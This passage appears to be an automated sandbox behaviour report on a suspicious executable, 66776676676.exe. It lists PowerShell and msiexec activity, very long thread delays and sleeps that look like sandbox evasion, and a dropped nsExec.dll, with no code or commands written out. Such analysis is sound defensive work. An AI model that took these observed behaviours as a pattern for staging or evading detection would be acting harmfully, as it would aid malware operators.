            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\Desktop\66776676676.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\66776676676.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\66776676676.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599890Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599668Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599562Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599452Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599343Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599234Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599124Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599015Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598906Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598796Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598687Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598578Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598468Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598359Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598248Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598140Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598031Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597912Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597796Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597687Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597574Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597468Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597359Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597248Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597140Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597031Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596921Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596812Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596703Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596593Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596484Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596374Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596265Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596156Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596046Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595937Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595827Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595717Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595609Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595499Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595390Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595281Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595171Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595062Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594953Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594841Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594733Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594624Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6947Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2765Jump to behavior
            Source: C:\Users\user\Desktop\66776676676.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nszF56F.tmp\nsExec.dllJump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6024Thread sleep time: -7378697629483816s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152Thread sleep time: -27670116110564310s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152Thread sleep time: -599890s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 7140Thread sleep count: 8093 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 7140Thread sleep count: 1767 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152Thread sleep time: -599781s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152Thread sleep time: -599668s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152Thread sleep time: -599562s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152Thread sleep time: -599452s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152Thread sleep time: -599343s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152Thread sleep time: -599234s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152Thread sleep time: -599124s >= -30000sJump to behavior
